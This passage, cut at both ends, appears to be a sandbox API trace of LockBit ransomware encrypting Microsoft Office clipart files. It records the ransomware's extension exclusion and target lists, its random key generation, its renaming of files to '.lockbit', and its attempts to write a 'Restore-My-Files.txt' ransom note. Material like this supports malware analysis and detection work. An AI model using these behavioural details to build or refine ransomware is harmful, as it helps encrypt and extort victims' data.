files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.638] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5642c4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2a80, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152560.WMF", cAlternateFileName="")) returned 1 [0144.638] lstrcmpiW (lpString1=".", lpString2="J0152560.WMF") returned -1 [0144.638] lstrcmpiW (lpString1="..", lpString2="J0152560.WMF") returned -1 [0144.638] PathFindExtensionW (pszPath="J0152560.WMF") returned=".WMF" [0144.638] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.638] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.638] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.638] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.638] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.638] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.638] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.638] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.638] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.638] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.638] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.638] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.638] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.639] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.639] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.640] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.640] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.640] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.640] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.640] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.640] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.640] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.640] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.640] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.640] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.640] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.640] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.640] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.640] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152560.WMF") returned 1 [0144.640] lstrcmpiW (lpString1="ntldr", lpString2="J0152560.WMF") returned 1 [0144.640] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152560.WMF") returned 1 [0144.640] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152560.WMF") returned -1 [0144.640] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152560.WMF") returned -1 [0144.640] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152560.WMF") returned 1 [0144.640] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152560.WMF") returned -1 [0144.641] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.641] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF") returned=".WMF" [0144.641] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.641] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.641] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.642] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.642] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.642] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.642] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.642] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.642] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.642] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.642] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.642] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.642] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.642] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF.lockbit") returned 72 [0144.642] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152560.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0144.643] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.643] malloc (_Size=0x40068) returned 0x1ff1e60 [0144.643] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=10880) returned 1 [0144.643] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.644] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.644] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0144.644] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.645] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0144.645] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0144.676] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.676] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.676] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0144.676] free (_Block=0x1fa2ed8) [0144.676] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152560.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.676] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.676] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.677] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65f4d5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe70, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152568.WMF", cAlternateFileName="")) returned 1 [0144.677] lstrcmpiW (lpString1=".", lpString2="J0152568.WMF") returned -1 [0144.677] lstrcmpiW (lpString1="..", lpString2="J0152568.WMF") returned -1 [0144.677] PathFindExtensionW (pszPath="J0152568.WMF") returned=".WMF" [0144.677] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.677] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.678] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.678] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152568.WMF") returned 1 [0144.679] lstrcmpiW (lpString1="ntldr", lpString2="J0152568.WMF") returned 1 [0144.679] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152568.WMF") returned 1 [0144.679] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152568.WMF") returned -1 [0144.679] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152568.WMF") returned -1 [0144.679] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152568.WMF") returned 1 [0144.679] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152568.WMF") returned -1 [0144.679] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.679] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF") returned=".WMF" [0144.679] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.679] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.679] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.680] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.680] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0144.680] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0144.680] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0144.680] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0144.680] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0144.680] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0144.680] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0144.680] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0144.680] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0144.680] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0144.680] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0144.680] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0144.680] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0144.680] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF.lockbit") returned 72 [0144.680] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152568.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0144.682] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0144.682] malloc (_Size=0x40068) returned 0x3df0008 [0144.682] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3696) returned 1 [0144.682] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0144.683] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0144.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0144.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0144.683] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0144.685] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0144.685] malloc (_Size=0xa6) returned 0x1fa2ed8 [0144.685] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0144.686] free (_Block=0x1fa2ed8) [0144.686] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152568.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0144.687] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0144.687] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0144.687] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5642c4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd28, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0152570.WMF", cAlternateFileName="")) returned 1 [0144.687] lstrcmpiW (lpString1=".", lpString2="J0152570.WMF") returned -1 [0144.687] lstrcmpiW (lpString1="..", lpString2="J0152570.WMF") returned -1 [0144.687] PathFindExtensionW (pszPath="J0152570.WMF") returned=".WMF" [0144.687] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0144.687] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0144.687] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0144.687] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0144.687] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0144.687] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0144.687] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0144.687] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0144.687] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0144.687] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0144.687] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0144.687] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0144.688] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0144.688] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0144.689] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0152570.WMF") returned 1 [0144.689] lstrcmpiW (lpString1="ntldr", lpString2="J0152570.WMF") returned 1 [0144.689] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0152570.WMF") returned 1 [0144.689] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0152570.WMF") returned -1 [0144.689] lstrcmpiW (lpString1="autorun.inf", lpString2="J0152570.WMF") returned -1 [0144.689] lstrcmpiW (lpString1="thumbs.db", lpString2="J0152570.WMF") returned 1 [0144.690] lstrcmpiW (lpString1="iconcache.db", lpString2="J0152570.WMF") returned -1 [0144.690] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0144.690] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152570.WMF") returned=".WMF" [0144.690] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0144.690] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0144.690] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0144.690] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0144.690] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0144.690] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0144.690] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0144.690] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0144.690] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0144.690] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0144.690] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0144.690] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0144.690] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0144.690] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0144.690] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0144.690] lstrcmpiW (lpString1=".mdf", 